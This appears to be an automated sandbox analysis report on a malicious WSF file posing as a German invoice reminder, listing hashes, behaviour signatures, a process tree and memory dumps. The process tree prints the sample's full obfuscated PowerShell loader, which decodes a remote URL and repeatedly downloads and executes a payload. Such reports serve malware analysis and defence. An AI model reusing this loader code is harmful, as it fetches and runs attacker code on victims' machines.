Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    14/10/2024, 19:18

General

  • Target

    Bestellerinnerung-Rechnungsnummer2024-507315.wsf

  • Size

    8KB

  • MD5

    5247deb6930b445cd63f008cda63e6f9

  • SHA1

    fa431cd45329897eea0d64475bc16a22f0bae896

  • SHA256

    b5179dcf8c55b9131d102cf216dfacbcf78d2e3f773d2493ce9aaa84db1d6b7a

  • SHA512

    cc71ec3bad16628cca7e63805415e9a5924203cd34fbb8ec23e88e68f4f994d209d1aa0b5ae45dbe6a92c0f5b6b7065d55ec696490cb3b4030545348ac7aecec

  • SSDEEP

    192:A8RsImHVMItdYFuInCqNGIXFfHokbUjC5JjLPdMUep1fkqvzO:+mfC1AbUQjDdML1rvK

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request (64 IoCs)
  • System Network Configuration Discovery: Internet Connection Discovery (1 TTPs, 2 IoCs)

    Adversaries may check for Internet connectivity on compromised systems.

  • Runs ping.exe (1 TTPs, 1 IoCs)
  • Suspicious behavior: EnumeratesProcesses (1 IoCs)
  • Suspicious use of AdjustPrivilegeToken (1 IoCs)
  • Suspicious use of WriteProcessMemory (9 IoCs)

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Bestellerinnerung-Rechnungsnummer2024-507315.wsf"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2212
    • C:\Windows\System32\cmd.exe
      cmd.exe /c ping aszzzw_6777.6777.6777.677e
      2⤵
      • System Network Configuration Discovery: Internet Connection Discovery
      • Suspicious use of WriteProcessMemory
      PID:2696
      • C:\Windows\system32\PING.EXE
        ping aszzzw_6777.6777.6777.677e
        3⤵
        • System Network Configuration Discovery: Internet Connection Discovery
        • Runs ping.exe
        PID:2660
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#cockscomb Potaske Indtagelse vitellose Bearbejders Inclips #>;$rectoplasty='Overemphasised';<#Striktrjens Marketenderiernes Feramorz Transuranic Gadis Sucklings Lukas #>;$Milen176=$Udbredelsen+$host.UI;If ($Milen176) {$Guldllerne++;}function Ungdomssektioner96($overcramming){$Neckercher=$Clearesmpetuosity+$overcramming.'Length'-$Guldllerne; for( $Cleares=4;$Cleares -lt $Neckercher;$Cleares+=5){$Askernes++;$favel+=$overcramming[$Cleares];$Rigsembedet='reallnsbegrebet';}$favel;}function Fagidioterne($chapeaux){ . ($Eksplosionsmotors) ($chapeaux);}$Bedragerenes=Ungdomssektioner96 ' ResMS yroArlez YeniD talGvinlkonsaMis /vigo ';$Bedragerenes+=Ungdomssektioner96 'Supe5Gen .Igno0Urer lan(ToniW ArciS,banEj nd SynoCubiwmasssTetr MooN upeTBluf Unbo1A.be0mong. luk0T.ye;Av,s rac.W O.piGe,dnFdre6Palm4Brod;Nong Fe rx ded6.ezz4Hypo; Pho FacurMaurv Gl.:Knsl1De.e3Decr1Majo.Blov0 Civ)Gra BortGKonveStomcInhakAktiodest/Spec2Ball0.uto1afte0Tank0F ui1 Ko 0Felt1 Li, TilsF Kr i Skrr Ny eAfkrfStu oI.vexS ae/udle1 Und3 Go 1per .Sted0Ov,r ';$Uranosphaerite=Ungdomssektioner96 'Ga lUGenus,obbe idaR Ema-,rmeaApopgKurfESol,NFlimt Tri ';$Modiste=Ungdomssektioner96 'Quadh St,tMoontJo dp on:Unve/Ban /Benzc Ad.aFo,erPilgeSende t ar Du fProai VotnRobodBalseInutr S l.OmstrModeo ha / uieIBedlnForec rcoDargnBolsc Fodu D drSusprV.rkeCollnPaattScut.GttecSchmuFestrTort ';$Lejren=Ungdomssektioner96 ' Org>Iw.r ';$Eksplosionsmotors=Ungdomssektioner96 'I doiPlaiEDatoxShad ';$Gravelous='Katinas';$Flidsprmiens='\Baccillum.Tri';Fagidioterne (Ungdomssektioner96 'Xant$FornGVar L Slao heebChinASlimLEmir:Bre fSkaaosupeR LinrPenta MoraR trdScioN echE SidlTo asNuc EOp us uld=A pe$ rniEActuNMindvInte: ForaTrolpSpo pP.imdRe oa EnkT TanaAmts+ ava$PludFIr,rl SkiI ImpD SalsLysep DelR Tetmfe liDeatEthroNOstrSNeb ');Fagidioterne (Ungdomssektioner96 're,i$Ox,bGIndiL kraOC.arBCapaA illPr.m:PyredKromaVulcVRatiI.grosr vsoconcn Car=Gyne$ urimForeOEa tDL 
veIP,ogS SeetOv,rE Oby.PracSChikPObjelSiwaiOr nT Un.(Foto$TriaLGemmEUndej Wi R vaneSkurnPen,)D gb ');Fagidioterne (Ungdomssektioner96 ' Reg[ G lN umbe IndtBach.Specs ileLiporAuktvOs aIHeadCSupeefig,P LilOElk IProlNMemot DamMButiABiognSyntATopcgIndye Oe,R ant]Tun : Gra:Va,rS BonEReg C Si U.eenRRrflIIsenTMindY BlypBortrsupeoSubcTManoOAktiCGlobo SkoLF.rd kine=Bred Foot[L ppNpy,eeDeviTVelg.LetfSUreaeLoc CFor,u Corr VegiD arTKaneYbetjPGalsR.criOMou tOlivO,yphCBetaoMorplUndeTEkspYRel P Inve S.r]Ref.: U.s:,kattCateL arrsCirc1Pljn2Ecto ');$Modiste=$Davison[0];$Vax=(Ungdomssektioner96 'Non $PappgFaucL Smao uphBOptiaR ntlBedi: edKDkniADundS CocTHoneeMac.pReocIIkenlSofiekarbNLigaEA.to= SmrNLecae muswUna - TolOCalcBNu zjChoreat eCNonat See Kob.S UpdySkarS ta T Afle NonMProd.ReednDragEPrf.ti tu.HimmWP.rseAdj bSmrecRantlFrplIForsESpgeNPla t New ');Fagidioterne ($Vax);Fagidioterne (Ungdomssektioner96 'unen$,ankKSneea co.s ebst U feGonzpSyn i LaclTe,teBe,anKle,eCons.Hub HMedie MaraRenod Stae DksrUn.isFoss[Disp$LandU overFremapaa,n VlgoRykks ldnpCathhBff,aErioeMargrOpkaiS.ylt A reTel ] unb=Anch$ ComBFatseMaa dUnplrEtiqa Se gdefeeJagtrekvie lovn rbae VicsSoma ');$Pericementoclasia=Ungdomssektioner96 'P.el$HeadKRed.aSemisP yltIsoae LevpT,ckiYdedlBrneeS ben Same .nt. 
p rD.dvooDel.w dannUnsilScaroDol a Mold uinFInduistarl PateEfte(Card$HermMOv roFastd nteiPrees R stKulmeBona,Dcla$Bis.CEpigoNeuruPatrnBjlktTrige aasrAfsvpFjerrIndho SkidTeksuLasscT.igtDyk iSyncvDoseeDe ulWillyKas,)Voya ';$Counterproductively=$Forraadnelses;Fagidioterne (Ungdomssektioner96 ' Sna$,pisGNesolUnsaOJas b orha ernlS ri:RastD iraI Defa CloE,oldRLinj=Pipa(Sbe,TOug e nts F rtFlje-Af.epBetjAAfkat Ba hL et Nonc$ e tCAastO,ayiuPlernKlo,TBordE Cy.RP erPRffer BruOHelmD Z gu ArsCConiT Kbmi D lVheadE.oncLConty udi)Pall ');while (!$Diaer) {Fagidioterne (Ungdomssektioner96 'Mi p$Non,g LeulFarvoAmpebArraayam.lKred: IndFXylorTot,aBrannSpectAeroiUndecHerraB hjlArtilab.uyFo p=Imp $CloctB utrHam uRagoeHale ') ;Fagidioterne $Pericementoclasia;Fagidioterne (Ungdomssektioner96 'RetiSMas.tJ dtaTil.rPrest Byi-BrleSR,flLZealEPrede Un PSubs Inco4 Rvb ');Fagidioterne (Ungdomssektioner96 ',mri$Enemg SlolK rsoLakebGy,nA UnslThel:ArkoDU iniSporaAff ETee.RHygr=Grap(NonttBindEPrecs FerTTekn-MeetP N,ta tyrtSammhVerd Lysr$ BricteacOAtioUGk eN N.dTGenne FouRMiliPDys r TllO ierd ChouTaktcDaist UnciNatiVC,rre Io lEkspypun )Unli ') ;Fagidioterne (Ungdomssektioner96 'P,at$DetagSouplBe.yoAfsyBguddaRepoLUndd:t rsT NonOD senLeakgSingADrmmNSalae B.kRFedtEomlanDupl=Tra $gno G Pr l Bi O otrBFiltaS usLT at:Polyf R.rO narFarvEDi cs SvitMicrWWoopaDyksr SamD IndsSub +Ste,+Th s%pens$ Kald askACru VIde i defsTektoOdelNOver.ChauC ravo EncUD kunPiltt Sha ') ;$Modiste=$Davison[$Tonganeren];}$jordbrrene=323447;$Empaneled=30892;Fagidioterne (Ungdomssektioner96 'Filn$ChalGA trlBe,tOGittb Tana erklSelv:Ud.kbTan ASa naAstrdsledE BarS BiokSappuThauRProg yge= Afd chagOldeEStattUdsp-Eri.c,epeoKe,inN ckt AndERetoNSystTTirr non $Sa rC verOTrttUTrifNMe.eT K nELuxuRSvinPO.gaR QueO hivd ponu .neCAfhuT Ae ISrgev aalE WitlProdYPyod ');Fagidioterne (Ungdomssektioner96 'Adua$Unrig pstl UnsoB ghb AvaaRockl coo:tossGDet r ,alaUntwt iseirudknDar.eRemerLaboeEndenBromdstaneBlab .oly=just Ninn[ U.aS AggyL ersSexst 
NoneMythm.hes.F,raCPr doColon moovGli,eGl srForut yst] Het:Iran:doorF ldlrElecoNonjmTaskBSchiaKlumsBismeOm l6Klip4M llS BkktForerAnusi Tern .pggHema(Sati$ PreB Tria Un.a PandTod eBj.rs AnhkParruFarvrLe,e) ast ');Fagidioterne (Ungdomssektioner96 'Cour$Sydag VitlSerao TribHydraD.felBerl:C inURemuN arbDunmiEDiscmSma,O matCB arr Equa hentSwerIShetSepr.EFugl Bl d=Gold Mora[LungSindhy Kers tewTD.twETri MBenz.RepoTOverESle xPanttGe a.Erh.eDvalN ndkc FdeOAreedMacri CisnBoksgDe.c]Unco:Lead:OverASeigsBlasCKultiF.riiDef .PolyGUdblEOviptBrn s ilbtSelvrTilfiKelin HypGredr(Skri$AnargUpbrrSpryaThe,tDataI Vannudf E DadRSel eShrinFilcD Sk EUdf,)Subs ');Fagidioterne (Ungdomssektioner96 'Serv$ eacG DeslTrumoT lsb TonAUnc.L,obb: ippDNov RHomoO GlosDec,cTippHLocoeP,psR Tel= upe$ButtUGradnEpimdSt aem ldmPil.O Midcforkr harAu.vnT ReriRetis QueEBes ..algs emiu in bGangSBr mTCou rGav Ibolvn PliGAn i(A et$SwagJMusto ndeRStrud Ma.b Ca rGor,rUnpee CounTohaEN nn, Pol$HimmE AabmW.igPUlstaFremNSperET rtLFirmEHomadAfh.) ini ');Fagidioterne $Droscher;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2928

Network

MITRE ATT&CK Enterprise v15

Downloads

  • memory/2928-4-0x000007FEF64CE000-0x000007FEF64CF000-memory.dmp
    Filesize: 4KB
  • memory/2928-5-0x000000001B700000-0x000000001B9E2000-memory.dmp
    Filesize: 2.9MB
  • memory/2928-6-0x0000000002280000-0x0000000002288000-memory.dmp
    Filesize: 32KB
  • memory/2928-7-0x000007FEF6210000-0x000007FEF6BAD000-memory.dmp
    Filesize: 9.6MB
  • memory/2928-8-0x000007FEF6210000-0x000007FEF6BAD000-memory.dmp
    Filesize: 9.6MB
  • memory/2928-10-0x000007FEF6210000-0x000007FEF6BAD000-memory.dmp
    Filesize: 9.6MB
  • memory/2928-9-0x000007FEF6210000-0x000007FEF6BAD000-memory.dmp
    Filesize: 9.6MB
  • memory/2928-11-0x000007FEF6210000-0x000007FEF6BAD000-memory.dmp
    Filesize: 9.6MB
  • memory/2928-12-0x000007FEF64CE000-0x000007FEF64CF000-memory.dmp
    Filesize: 4KB
  • memory/2928-13-0x000007FEF6210000-0x000007FEF6BAD000-memory.dmp
    Filesize: 9.6MB
  • memory/2928-14-0x000007FEF6210000-0x000007FEF6BAD000-memory.dmp
    Filesize: 9.6MB